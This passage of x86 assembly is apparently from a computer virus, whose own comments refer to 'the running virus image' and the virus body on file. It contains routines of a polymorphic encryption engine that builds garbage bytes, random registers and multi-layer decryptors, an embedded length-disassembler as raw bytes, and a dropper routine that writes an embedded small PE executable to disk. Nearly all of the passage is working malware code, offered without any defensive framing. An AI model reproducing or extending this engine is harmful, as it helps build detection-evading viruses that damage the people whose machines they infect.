; filler; the callers are outside this listing).
; In:   edi = output pointer
; Out:  edi advanced by the count; ecx = 0 unless the count was 0
; Clobbers: eax, ecx, flags
;-----------------------------------------------------------------------
krappo_gen:
call get_random ; generate krap bytes
and eax,01fh ; count 0..31 (whole ecx, so `loop` is safe)
jz exit_krappo
xchg eax,ecx
krap_stuffy:
call get_random
stosb
loop krap_stuffy
exit_krappo:
ret
;-----------------------------------------------------------------------
; get_random_al7 -- random value 0..7 in the whole of eax (upper bits 0).
; Clobbers: eax, flags (preserves ebx, ecx, edx like get_random)
;-----------------------------------------------------------------------
get_random_al7:
call get_random
and eax,0111b
ret
;-----------------------------------------------------------------------
; get_random -- pseudo-random dword.  Linear congruential generator
; seed = (seed*4096 + 150889) mod 714025 (ia, ic, im as commented), then
; scaled to the full 32-bit range: eax = seed*(2^32-1)/714025.
; Out:  eax in 0 .. 2^32-1; at most 714025 distinct values (the LCG
;       period), so this spreads values but is not a strong generator.
; Preserves ebx, edx, ecx; flags undefined (div).  The seed lives inside
; the `mov eax,imm32` instruction and is rewritten through [seed+ebp], so
; this code must be writable and ebp must hold the delta offset.
;-----------------------------------------------------------------------
get_random:
push ebx
push edx

db 0b8h ; mov eax,
seed dd 000h ; random seed, must be < im
mov ebx,4096d ; ia
mul ebx ; seed < im, so the product fits in eax and edx = 0
add eax,150889d ; ic
adc edx,0 ; carry of the add into edx for the 64-bit div
mov ebx,714025d ; im
push ebx ; kept as divisor for the scaling below
div ebx
mov dword ptr [seed+ebp],edx ; new seed = remainder
xchg eax,edx
cdq ; edx = 0 (eax < im); the mul below overwrites edx anyway
xor ebx,ebx
dec ebx
mul ebx ; * 2^32 - 1
pop ebx
div ebx ; here we have 0 <= rnd < 2^32
pop edx
pop ebx
ret
;-----------------------------------------------------------------------
; is_used -- test whether register al (0..7, x86 encoding) is flagged in
; r_used.
; In:   al = register number
; Out:  ZF clear (NZ) = in use, ZF set (Z) = free;
;       cl = al -- callers such as get_register, regs_checking and
;       select_save rely on this side effect
; Preserves eax; clobbers cl and flags
;-----------------------------------------------------------------------
is_used:
; AL register
push eax
mov cl,al
mov al,1
shl al,cl ; bit mask for the register
test byte ptr [r_used+ebp],al
pop eax
; Z = register not used
; NZ = register used
ret
;-----------------------------------------------------------------------
; set_used -- flag register al (0..7) as in use in r_used.
; In:   al = register number
; Preserves eax; clobbers flags (CF = previous bit state).
; Note: the word-sized BTS touches r_used and the following byte
;       (t_chgpnt); with a bit index below 8 only r_used changes.
;-----------------------------------------------------------------------
set_used:
; AL register
push eax
xor ah,ah
bts word ptr [r_used+ebp],ax
pop eax
ret
;-----------------------------------------------------------------------
; unset_used -- clear the in-use flag of register bl (0..7) in r_used.
; In:   bl = register number
; Clobbers: bh (zeroed), flags (CF = previous bit state).
; Note: word-sized BTR, same remark as set_used.
;-----------------------------------------------------------------------
unset_used:
; BL register
xor bh,bh
btr word ptr [r_used+ebp],bx
ret
;-----------------------------------------------------------------------
; get_register -- draw a random register that is not flagged in r_used.
; Out:  cl = register number (0..7)
; Preserves eax; clobbers cl and flags.
; Does not terminate if all eight bits of r_used are set.  The engine must
; keep esp and every live decryptor register flagged, otherwise they are
; handed out as garbage operands.
;-----------------------------------------------------------------------
get_register:
push eax
reget_reg:
call get_random_al7
call is_used
jnz reget_reg ; check we aren't using it
; the is_used will put the reg in cl
pop eax
ret
;-----------------------------------------------------------------------
; get_address -- pick a random address inside the running virus image, in
; [v_runnin, v_runnin + bytes_generated_so_far + v_lenght].
; In:   edi = output pointer; ebp = delta offset
; Out:  eax = address
; Clobbers: ebx, ecx, edx, flags (esi preserved)
; t_inipnt (start of the output buffer) and t_memand are stored as the
; immediates of the `sub ebx,imm32` / `mov cl,imm8` instructions below
; and are also read as plain data by mem_write; the initialisation code
; (not in this listing) patches them.  The loops do not terminate if every
; candidate is below v_runnin or if the span in ebx is 0.
;-----------------------------------------------------------------------
get_address:
push esi
mov ebx,edi
lea esi,[offset v_runnin + ebp]
db 081h,0ebh ; sub ebx,initial_edi
t_inipnt dd 00h ; so we have actualy dec lenght -> ebx = bytes generated so far

add ebx,dword ptr [esi - (offset v_runnin - offset v_lenght)] ; + body length = span
mov edx,dword ptr [esi] ; v_runnin

db 0b1h ; mov cl,
t_memand db 00h ; significant bits present (number of high bits cleared below)

add edx,ebx ; edx = run-time end of the image

search_offset2:
call get_random
shl eax,cl
shr eax,cl ; clear the top cl bits
cmp eax,dword ptr [esi] ; is < starting off of poly?
jb search_offset2
look_foroff2:
cmp eax,edx ; upper border
jbe ok_offset2
sub eax,ebx ; step down by one span until inside [v_runnin, edx]
jmp look_foroff2
ok_offset2:
pop esi
ret
; how much memory does the ETMS need, so you can subtract it from the length
; of the virus on file of course
_mem_space = (offset _mem_data_end - offset _mem_data_start)

; everything down there just in mem, don't save it in your file
; Run-time state of the engine.  The garbage generators address several of
; these fields relative to t_pushed (`[edx - (offset t_pushed - offset X)]`)
; and do_jumpzh saves t_pushed..t_inacall with one dword push, so the
; relative layout below is part of their contract.
_mem_data_start:

r_pointer db 00h ; register used as pointer (0FFh = not assigned yet)
r_counter db 00h ; register used as counter
r_regkey db 00h ; register used as key, 20h use
; immediate as key
r_used db 00000000b ; bit n set = register n (x86 encoding) is in use
; bits meaning 0 0 0 1 0 0 0 0
; E E E E E E E E
; D S B S B D C A
; I I P P X X X X

t_chgpnt db 00h ; changes to be made to pointer
t_chgcnt db 00h ; changes to be made to counter
t_chgkey db 00h ; changes to be made to key register
t_chgmat db 00h ; changes to be made to operation
t_exitjmp db 00h ; 01 has to create exit jmp, 00h no
t_prejmp db 00h ; number of key changes b4 jmp
m_writes db 00h ; already written mem in a loop? (mem_write nesting guard)
; do not put anything here, or else change the initialisation!
t_pntoff dd 00h ; offset added to pointer (00h if not
; added)
t_cntoff dd 00h ; constant to be added to counter
; value

t_fromend db 00h ; 00h from start, else from end
t_countback db 00h ; 01h decrementing, else incrementing

t_pushed db 00h ; pushed dwords (forced to 0 while generated code must not touch the stack)
t_maxjmps db 00h ; max jumps
t_inacall db 00h ; into a call or not
db 00h ; padding; saved/restored together with the three bytes above

v_lenght dd 00h ; length of the virus body
v_virusp dd 00h ; pointer to body
v_runnin dd 00h ; offset at which dec will run

w_counter dd 00h ; where counter is assigned - 1
w_loopbg dd 00h ; where loop begins (0 while no loop is open)
w_encrypt dd 00h ; pointer on current pos in encryptor

orig_dx dd 00h
t_chkpos dd 00h ; position of the checking jmp

l_space equ (enc_max + 10h) ; one layer record: 4 dwords + encryptor bytes
tl_space equ (6 * l_space)
layer_end dd 00h ; last nr of layer * layer dim
layer_nr dd tl_space ; number of layers (0-6) * layer dim

; data structures for all the layers (seven records of l_space bytes)
; first layer is the last in mem and so on...
enc_space:
dd 00h ; initial key
dd 00h ; counter
dd 00h ; initial pointer
dd 00h ; position of the pointer in dec
db enc_max dup (90h) ; encryptor

dd 4 dup (00h)
db enc_max dup (90h)

dd 4 dup (00h)
db enc_max dup (90h)

dd 4 dup (00h)
db enc_max dup (90h)

dd 4 dup (00h)
db enc_max dup (90h)

dd 4 dup (00h)
db enc_max dup (90h)

dd 4 dup (00h)
db enc_max dup (90h)
_mem_data_end:
; LDE32BIN.INC -- Length-Disassembler Engine //32-bit
; 1.06
; generated file. do not edit
; NOTE(review): the two routines below are raw machine code.  Decoding
; their first bytes: disasm_init begins with PUSHAD and loads edi from
; [esp+24h] (one stack argument, the table it fills with STOSD);
; disasm_main begins with PUSHAD, loads esi from [esp+24h] and ecx from
; [esp+28h] (code pointer, table), stores eax into the PUSHAD frame at
; [esp+1Ch] and ends with POPAD / RET -- i.e. the instruction length is
; returned in eax and the caller removes the two arguments.  The callers
; are not in this listing; confirm against them before relying on this.
|
||
disasm_init:
|
||
db 060h,08Bh,07Ch,024h,024h,0FCh,033h,0C0h
|
||
db 050h,050h,050h,068h,000h,0A8h,0AAh,002h
|
||
db 068h,07Fh,068h,0FFh,03Fh,068h,0A0h,0DEh
|
||
db 0E6h,0FFh,068h,0FFh,0FFh,0D5h,0DBh,068h
|
||
db 0AAh,0AAh,0FEh,0FFh,068h,0AAh,0AAh,0AAh
|
||
db 0AAh,068h,000h,000h,0AAh,0AAh,050h,050h
|
||
db 050h,050h,050h,050h,068h,054h,001h,000h
|
||
db 000h,068h,055h,0F5h,0FFh,041h,068h,0AAh
|
||
db 0DDh,0DEh,055h,068h,011h,051h,095h,019h
|
||
db 068h,0FFh,01Fh,011h,011h,068h,0AAh,0FFh
|
||
db 011h,0FAh,068h,096h,0CFh,060h,08Eh,068h
|
||
db 0AAh,0D6h,072h,0FCh,068h,088h,0AAh,0AAh
|
||
db 0AAh,068h,0D5h,088h,088h,088h,068h,09Bh
|
||
db 055h,08Dh,052h,068h,053h,0D5h,06Ch,036h
|
||
db 068h,0FFh,055h,055h,035h,068h,0F9h,0D6h
|
||
db 0FEh,0FFh,068h,088h,088h,088h,068h,068h
|
||
db 088h,088h,088h,088h,068h,0CAh,047h,053h
|
||
db 08Dh,068h,0DFh,07Bh,0C6h,0DCh,068h,0AAh
|
||
db 0AAh,0AAh,0AAh,068h,0AAh,0AAh,0AAh,0AAh
|
||
db 068h,0FDh,04Fh,0A9h,0ABh,068h,0EAh,0FEh
|
||
db 0A7h,0D4h,068h,029h,075h,0FFh,053h,068h
|
||
db 0FEh,0A7h,0A4h,0FFh,068h,04Ah,0FAh,09Fh
|
||
db 092h,068h,0FFh,029h,0E9h,07Fh,0B9h,000h
|
||
db 002h,000h,000h,033h,0DBh,033h,0C0h,0E8h
|
||
db 014h,000h,000h,000h,0ABh,0E2h,0F6h,061h
|
||
db 0C3h,00Bh,0DBh,075h,007h,05Dh,05Eh,05Ah
|
||
db 056h,055h,0B3h,020h,04Bh,0D1h,0EAh,0C3h
|
||
db 0E8h,0ECh,0FFh,0FFh,0FFh,00Fh,083h,07Fh
|
||
db 000h,000h,000h,0E8h,0E1h,0FFh,0FFh,0FFh
|
||
db 073h,003h,0B4h,040h,0C3h,0E8h,0D7h,0FFh
|
||
db 0FFh,0FFh,072h,057h,0E8h,0D0h,0FFh,0FFh
|
||
db 0FFh,073h,04Dh,0E8h,0C9h,0FFh,0FFh,0FFh
|
||
db 073h,043h,0E8h,0C2h,0FFh,0FFh,0FFh,072h
|
||
db 025h,0E8h,0BBh,0FFh,0FFh,0FFh,073h,003h
|
||
db 0B0h,020h,0C3h,0E8h,0B1h,0FFh,0FFh,0FFh
|
||
db 073h,005h,066h,0B8h,002h,020h,0C3h,0E8h
|
||
db 0A5h,0FFh,0FFh,0FFh,073h,005h,066h,0B8h
|
||
db 008h,010h,0C3h,0B4h,003h,0C3h,0E8h,096h
|
||
db 0FFh,0FFh,0FFh,073h,003h,0B4h,060h,0C3h
|
||
db 0E8h,08Ch,0FFh,0FFh,0FFh,073h,003h,0B0h
|
||
db 018h,0C3h,0B4h,002h,0C3h,0B4h,080h,0C3h
|
||
db 0B4h,001h,0C3h,0E8h,079h,0FFh,0FFh,0FFh
|
||
db 073h,00Dh,0E8h,072h,0FFh,0FFh,0FFh,073h
|
||
db 003h,0B0h,008h,0C3h,0B4h,041h,0C3h,0B4h
|
||
db 020h,0C3h,0E8h,062h,0FFh,0FFh,0FFh,014h
|
||
db 000h,048h,0C3h
|
||
disasm_main:
|
||
db 060h,08Bh,074h,024h,024h,08Bh,04Ch,024h
|
||
db 028h,033h,0D2h,033h,0C0h,080h,0E2h,0F7h
|
||
db 08Ah,001h,041h,00Bh,014h,086h,0F6h,0C2h
|
||
db 008h,075h,0F2h,03Ch,0F6h,074h,036h,03Ch
|
||
db 0F7h,074h,032h,03Ch,0CDh,074h,03Bh,03Ch
|
||
db 00Fh,074h,044h,0F6h,0C6h,080h,075h,052h
|
||
db 0F6h,0C6h,040h,075h,073h,0F6h,0C2h,020h
|
||
db 075h,054h,0F6h,0C6h,020h,075h,05Ch,08Bh
|
||
db 0C1h,02Bh,044h,024h,028h,081h,0E2h,007h
|
||
db 007h,000h,000h,002h,0C2h,002h,0C6h,089h
|
||
db 044h,024h,01Ch,061h,0C3h,080h,0CEh,040h
|
||
db 0F6h,001h,038h,075h,0CEh,080h,0CEh,080h
|
||
db 0EBh,0C9h,080h,0CEh,001h,080h,039h,020h
|
||
db 075h,0C1h,080h,0CEh,004h,0EBh,0BCh,08Ah
|
||
db 001h,041h,00Bh,094h,086h,000h,004h,000h
|
||
db 000h,083h,0FAh,0FFh,075h,0ADh,08Bh,0C2h
|
||
db 0EBh,0CDh,080h,0F6h,020h,0A8h,001h,075h
|
||
db 0A7h,080h,0F6h,021h,0EBh,0A2h,080h,0F2h
|
||
db 002h,0F6h,0C2h,010h,075h,0A4h,080h,0F2h
|
||
db 006h,0EBh,09Fh,080h,0F6h,002h,0F6h,0C6h
|
||
db 010h,075h,09Ch,080h,0F6h,006h,0EBh,097h
|
||
db 08Ah,001h,041h,08Ah,0E0h,066h,025h,007h
|
||
db 0C0h,080h,0FCh,0C0h,00Fh,084h,07Bh,0FFh
|
||
db 0FFh,0FFh,0F6h,0C2h,010h,075h,02Dh,03Ch
|
||
db 004h,075h,005h,08Ah,001h,041h,024h,007h
|
||
db 080h,0FCh,040h,074h,017h,080h,0FCh,080h
|
||
db 074h,00Ah,066h,03Dh,005h,000h,00Fh,085h
|
||
db 059h,0FFh,0FFh,0FFh,080h,0CAh,004h,0E9h
|
||
db 051h,0FFh,0FFh,0FFh,080h,0CAh,001h,0E9h
|
||
db 049h,0FFh,0FFh,0FFh,066h,03Dh,006h,000h
|
||
db 074h,00Eh,080h,0FCh,040h,074h,0EDh,080h
|
||
db 0FCh,080h,00Fh,085h,035h,0FFh,0FFh,0FFh
|
||
db 080h,0CAh,002h,0E9h,02Dh,0FFh,0FFh,0FFh
|
||
|
||
|
||
drop_gen:
|
||
; edx - path
|
||
push 0 edx
|
||
call [ebp._lcreat]
|
||
cmp eax, -1
|
||
jz __2
|
||
xchg eax, ebx
|
||
call __1
|
||
db 04Dh,05Ah,050h,000h,002h,000h,000h,000h,004h,000h,00Fh,000h,0FFh,0FFh
|
||
db 000h,000h,0B8h,000h,000h,000h,000h,000h,000h,000h,040h,000h,01Ah,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,001h,000h,000h,0BAh,010h,000h,00Eh,01Fh,0B4h
|
||
db 009h,0CDh,021h,0B8h,001h,04Ch,0CDh,021h,090h,090h,054h,068h,069h,073h
|
||
db 020h,070h,072h,06Fh,067h,072h,061h,06Dh,020h,06Dh,075h,073h,074h,020h
|
||
db 062h,065h,020h,072h,075h,06Eh,020h,075h,06Eh,064h,065h,072h,020h,057h
|
||
db 069h,06Eh,033h,032h,00Dh,00Ah,024h,037h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,050h,045h,000h,000h,04Ch,001h,003h,000h,04Fh,02Ch
|
||
db 047h,069h,000h,000h,000h,000h,000h,000h,000h,000h,0E0h,000h,08Fh,083h
|
||
db 00Bh,001h,002h,019h,000h,002h,000h,000h,000h,004h,000h,000h,000h,000h
|
||
db 000h,000h,000h,010h,000h,000h,000h,010h,000h,000h,000h,020h,000h,000h
|
||
db 000h,000h,040h,000h,000h,010h,000h,000h,000h,002h,000h,000h,001h,000h
|
||
db 000h,000h,000h,000h,000h,000h,003h,000h,00Ah,000h,000h,000h,000h,000h
|
||
db 000h,040h,000h,000h,000h,004h,000h,000h,000h,000h,000h,000h,002h,000h
|
||
db 000h,000h,000h,000h,010h,000h,000h,020h,000h,000h,000h,000h,010h,000h
|
||
db 000h,010h,000h,000h,000h,000h,000h,000h,010h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,030h,000h,000h,054h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 043h,04Fh,044h,045h,000h,000h,000h,000h,000h,010h,000h,000h,000h,010h
|
||
db 000h,000h,000h,002h,000h,000h,000h,006h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,020h,000h,000h,060h,044h,041h
|
||
db 054h,041h,000h,000h,000h,000h,000h,010h,000h,000h,000h,020h,000h,000h
|
||
db 000h,000h,000h,000h,000h,008h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,040h,000h,000h,0C0h,02Eh,069h,064h,061h
|
||
db 074h,061h,000h,000h,000h,010h,000h,000h,000h,030h,000h,000h,000h,002h
|
||
db 000h,000h,000h,008h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,040h,000h,000h,0C0h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,06Ah,000h,0E8h,000h
|
||
db 000h,000h,000h,0FFh,025h,030h,030h,040h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,028h,030h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,038h,030h,000h,000h,030h,030h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,046h,030h,000h,000h,000h,000h,000h,000h,046h,030h,000h,000h
|
||
db 000h,000h,000h,000h,04Bh,045h,052h,04Eh,045h,04Ch,033h,032h,02Eh,064h
|
||
db 06Ch,06Ch,000h,000h,000h,000h,045h,078h,069h,074h,050h,072h,06Fh,063h
|
||
db 065h,073h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
|
||
